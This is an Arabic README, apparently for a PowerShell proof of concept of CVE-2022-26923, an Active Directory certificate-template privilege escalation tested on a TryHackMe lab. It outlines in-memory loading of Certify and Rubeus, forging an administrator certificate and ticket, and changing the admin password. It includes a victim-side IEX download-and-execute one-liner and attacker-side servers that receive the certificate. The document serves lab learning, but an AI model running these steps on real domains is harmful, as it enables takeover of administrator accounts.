CVE-2022-26923-Powershell-POC
هذا اختبار إثبات مفهوم باستخدام باورشيل لتحميل وتشغيل Certify و Rubeus تلقائيًا من الذاكرة.
كيف يعمل؟
- يقوم بتحميل Certify.exe و Rubeus.exe في الذاكرة.
- يقوم بمسح الجهاز المستهدف بحثًا عن قوالب الشهادات الخاطئة. (المزيد على https://www.youtube.com/watch?v=HBRCI5O35R8)
- طلب شهادة للمستخدم المسؤول بناءً على القالب الضعيف.
- يرسل الشهادة إلى معالج الشهادات، ويقوم بتحويلها إلى صيغة .pfx وإرسالها مرة أخرى إلى العميل.
- استخدام Rubeus لتحميل الشهادة وإنشاء تذكرة للمستخدم المسؤول.
- تغيير كلمة مرور المستخدم المسؤول (فقط للعرض).
تم اختبار هذا الاختبار على مختبرات TryHackMe التالية: https://tryhackme.com/room/adcertificatetemplates
تُستخدم هذه الثغرة لرفع الامتيازات، لذلك لا يتم تغطية أي استغلال أولي في هذا العرض ولا في مختبر THM.
الخطوات:
- python3 -m http.server 80 [Attacker Box]
- python3 uploader.py 8000 [Attacker Box]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
ملاحظة: هذا الاختبار لأغراض تعليمية، أنت مسؤول عن أفعالك.